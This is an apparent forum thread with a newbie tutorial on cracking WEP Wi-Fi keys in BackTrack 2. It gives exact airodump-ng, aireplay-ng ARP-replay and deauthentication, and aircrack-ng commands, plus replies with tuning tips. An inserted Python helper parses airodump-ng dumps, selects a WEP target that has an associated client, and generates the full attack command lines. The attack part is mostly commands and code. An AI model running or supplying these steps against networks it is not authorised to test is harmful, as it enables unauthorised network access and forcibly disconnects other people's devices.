Wow, that's a lot of YELLING.
OK. I'M A TOTAL NEWBIE TO LINUX AND SECURITY TESTING. I HAVE SEARCHED THIS FORUM AND HAVE YET TO FIND SIMPLE INSTRUCTIONS ON HOW TO CRACK WEP. SO, THIS IS FOR THE NEWBIES OUT THERE THAT ARE JUST LIKE ME. I USED BT 2 FINAL AND DID THIS CRACK ON A FRIEND'S AP, WITH HIS CONSENT. I HAD NO PRIOR KNOWLEDGE ABOUT HIS AP OR WHETHER HIS WEP WAS 64 OR 128 BIT. HERE GOES:
OPEN UP KISMET AND FIND THE AP YOU WISH TO CRACK. HIT "S" AND THEN "C". THIS WILL SORT THE APs BY CHANNEL. USE THE ARROW KEYS TO HIGHLIGHT THE AP YOU WISH TO CRACK. HIT ENTER. WRITE DOWN THE SSID, THE BSSID, AND THE CHANNEL. ALSO MAKE SURE IT HAS CLIENTS CONNECTED TO IT, OTHERWISE IT'S GOING TO BE NEXT TO IMPOSSIBLE TO OBTAIN ENOUGH IVs TO DO THE CRACK.
GO TO THE COMMAND SCREEN (CLICK THE SECOND ICON FROM THE LEFT ON THE BOTTOM LEFT SIDE OF THE SCREEN)
TYPE: airodump-ng -w capture -c CHANNELNUMBER DEVICE
THE DEVICE WILL BE THE NAME OF YOUR WIRELESS CARD. YOU SHOULD SEE THE NAME ON THE COMMAND SCREEN THAT CAME UP WHEN YOU OPENED KISMET. MINE IS ra0. THE CHANNELNUMBER IS THE NUMBER OF THE CHANNEL THE AP IS ON. HIT ENTER.
ON THE SCREEN NOW YOU SHOULD SEE THE MAC ADDRESS OF THE AP YOU ARE CRACKING. SEVERAL LINES BELOW IT YOU SHOULD SEE AT LEAST 2 MAC ADDRESSES. ONE WILL BE THE AP AND THE OTHER WILL BE THE CLIENT. WRITE DOWN THE CLIENT MAC ADDRESS.
GO TO THE COMMAND SCREEN AGAIN AND TYPE: aireplay-ng --arpreplay -b MACADDRESSOFAP -h MACADDRESSOFCLIENT DEVICE. HIT ENTER.
GO TO THE COMMAND SCREEN AGAIN AND TYPE: aireplay-ng -e SSIDOFNETWORK -a MACADDRESSOFAP -c MACADDRESSOFCLIENT --deauth 10 DEVICE. HIT ENTER.
IF YOU LOOK ON THE AIRODUMP SCREEN YOU SHOULD SEE THE DATA NUMBERS RISING AT A FAST RATE. ON THE AIREPLAY SCREEN (THE COMMAND YOU EXECUTED BEFORE THE DEAUTH), MAKE SURE THAT AN ARP REQUEST WAS CAPTURED AND IS NOW BEING RESENT. IF IT IS, THEN YOU SHOULD HAVE THE KEY IN NO TIME. LET IT RUN FOR ABOUT 5-10 MINS. YOU CAN CLOSE THE DEAUTH SCREEN.
GO TO THE COMMAND SCREEN AND TYPE: aircrack-ng -f 4 -b MACADDRESSOFAP -n 64 capture-01.cap
HIT ENTER. 64 IS FOR 64 BIT AND 128 IS FOR 128 BIT. IF YOU RUN THE CRACK ON 64 AND IT DOES NOT WORK AFTER A FEW TIMES, THEN TRY THE 128. THE ONE I CRACKED ENDED UP BEING 128 AND TOOK ABOUT 35 MINS TO CRACK WITH ABOUT 1.2 MILLION IVs. ONE IMPORTANT NOTE ABOUT THE capture-01.cap FILE: ON MINE, EVEN THOUGH I NAMED IT capture, IT NAMED IT capture-01. BE SURE TO CHECK UNDER EDITOR/KWRITE TO MAKE SURE OF THE EXACT NAME OF THE FILE. IT SHOULD BE THE ONLY .cap FILE IN THERE. JUST GO TO KWRITE AND GO TO OPEN. YOU SHOULD SEE YOUR FILE IN THERE. THIS HELD ME UP FOR QUITE SOME TIME UNTIL I SCREWED AROUND WITH IT.
ALSO, THE -f CAN BE RAISED OR LOWERED. A HIGHER NUMBER WILL TAKE LONGER AND A LOWER NUMBER WILL BE FASTER, BUT MAY NOT FIND THE KEY. I STICK WITH 4.
HOPE THIS HELPS YOU NEWBIES.
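The steps above are typed by hand from values copied off the kismet and airodump-ng screens, and two of the things that held the author up (a target with no associated client, and the -01 suffix airodump-ng adds to the capture prefix) can be checked mechanically. The following is an added example, not code from the original post or from the aircrack-ng project: it parses the CSV dump that airodump-ng writes alongside the .cap file (the column layout follows airodump-ng's <prefix>-NN.csv output; the sample dump below is constructed), picks the target AP and one of its clients, resolves the newest capture file, and builds the exact aireplay-ng and aircrack-ng command lines from the walkthrough. The ESSID "Friend1", the MAC addresses, and the interface name ra0 are made up for the example.

```python
"""Turn an airodump-ng CSV dump into the aireplay-ng/aircrack-ng command lines.

Added example for the WEP walkthrough above; not part of the original post.
Assumes the CSV layout airodump-ng writes to <prefix>-NN.csv: an AP table,
a blank line, then a station table. SAMPLE_CSV is constructed data.
"""
import csv
import io
import re
import shlex

SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2007-04-01 10:00:00, 2007-04-01 10:05:00,  6,  54, WEP , WEP, , -40,  120,  35,   0.  0.  0.  0,   7, Friend1, 
66:77:88:99:AA:BB, 2007-04-01 10:00:00, 2007-04-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -70,  80,  0,   0.  0.  0.  0,   5, NotMe, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:FF, 2007-04-01 10:01:00, 2007-04-01 10:05:00, -45,  300, 00:11:22:33:44:55, Friend1
11:22:33:44:55:66, 2007-04-01 10:01:00, 2007-04-01 10:05:00, -80,  10, (not associated) , 
"""

CAP_RE = re.compile(r"^(.*)-(\d+)\.cap$")


def _rows(section):
    """Parse one CSV table (header + rows) into a list of dicts keyed by header."""
    reader = csv.reader(io.StringIO(section), skipinitialspace=True)
    rows = [[f.strip() for f in r] for r in reader if any(f.strip() for f in r)]
    header, body = rows[0], rows[1:]
    return [dict(zip(header, r)) for r in body]


def parse_airodump_csv(text):
    """Split the dump at the blank line into the AP table and the station table."""
    ap_part, _, sta_part = text.partition("\n\n")
    return _rows(ap_part), _rows(sta_part)


def pick_target(aps, stations, essid):
    """Select the AP by ESSID and refuse targets the walkthrough cannot handle:
    non-WEP networks, and WEP networks with no associated client to replay."""
    matches = [ap for ap in aps if ap["ESSID"] == essid]
    if not matches:
        raise LookupError(f"no AP named {essid!r} in the dump")
    ap = matches[0]
    if not ap["Privacy"].startswith("WEP"):
        raise ValueError(f"{essid!r} uses {ap['Privacy']}, not WEP")
    clients = [s["Station MAC"] for s in stations if s["BSSID"] == ap["BSSID"]]
    if not clients:
        raise ValueError("no associated client: ARP replay needs one")
    return {
        "essid": essid,
        "bssid": ap["BSSID"],
        "channel": int(ap["channel"]),
        "clients": clients,
        "ivs": int(ap["# IV"]),
    }


def latest_capture(filenames, prefix="capture"):
    """airodump-ng appends -01, -02, ... to the -w prefix; return the newest .cap."""
    found = []
    for name in filenames:
        m = CAP_RE.match(name)
        if m and m.group(1) == prefix:
            found.append((int(m.group(2)), name))
    if not found:
        raise FileNotFoundError(f"no {prefix}-NN.cap written yet")
    return max(found)[1]


def build_commands(target, iface, cap_file, prefix="capture", key_bits=64, fudge=4):
    """The four command lines from the walkthrough, with real (lowercase) flags."""
    bssid, client = target["bssid"], target["clients"][0]
    essid = shlex.quote(target["essid"])
    return {
        "airodump": f"airodump-ng -w {prefix} -c {target['channel']} {iface}",
        "arpreplay": f"aireplay-ng --arpreplay -b {bssid} -h {client} {iface}",
        "deauth": f"aireplay-ng --deauth 10 -e {essid} -a {bssid} -c {client} {iface}",
        "aircrack": f"aircrack-ng -f {fudge} -b {bssid} -n {key_bits} {cap_file}",
    }


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    target = pick_target(aps, stations, "Friend1")
    cap = latest_capture(["capture-01.cap", "capture-01.csv", "capture-02.cap"])
    for step, cmd in build_commands(target, "ra0", cap).items():
        print(f"{step:>9}: {cmd}")
```

Run it against the real dump by reading <prefix>-NN.csv instead of SAMPLE_CSV and passing os.listdir(".") to latest_capture; when the 64-bit run fails, call build_commands with key_bits=128 to get the second aircrack-ng line the post describes.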
Agreed, bunch of yelling, and I hate reading shit in caps. Anyways, props for the tut, but there are at least 4 of them out there.
Why go through all that typing of commands? With airoscript you just press 1, 2, 3, or 4 to run those commands.
Sorry about the caps, guys... Yeah, I have seen the other tuts on WEP cracking, but most use older versions of BT and were not applicable to complete newbies... Not too familiar with using airoscript; I just prefer to type the commands out, although I will make an attempt to learn to use airoscript.
Sorry for burning you on the caps... Please know that the contribution back to the community is appreciated even if we bust yer chops for YELLING!
How long should I leave aircrack working, and how do I know whether the encryption type is 64 or 128?
How would I identify that aircrack is not working with a particular encryption type, for example 64?
By the way, GREAT TUT! I just wish there was a video where we could watch how to crack WEP using BackTrack 2 Final.
How long you leave aircrack running depends on how many IVs you have. I have only cracked a 128-bit key, and it took about 30-45 mins with 1.2 million IVs. I believe the number for 64-bit is around 250,000-500,000. When I tried with 64-bit it ran for about 10 mins and then told me it couldn't find the key, so I changed the -f factor from 4 to 10 and it took a bit longer but still told me it couldn't find it. I then ran aircrack for 128-bit and it ran for quite some time before it found the key. I left aireplay running while aircrack was running also; that way it kept the IVs rising.
One more thing you should try is using -i 1; chances are it's the first hex key, and it will save you a lot of time if it is. In a few cases I have cracked 64-bit keys with 100,000 IVs in less than a minute.
OK, whenever I try to do an arpreplay attack it says the specified MAC did not match the other MAC, or something like that, and it says 0 for sent and 0 ARP requests. Any ideas? Oh, and BTW the PWR under airodump always shows -1, even though I own RKJ and it's just upstairs in my house. My wireless card is built into an IBM ThinkPad (Intel Centrino mobile technology). Here's a picture:
Removed by me
PLEASE help me out !!
Thanks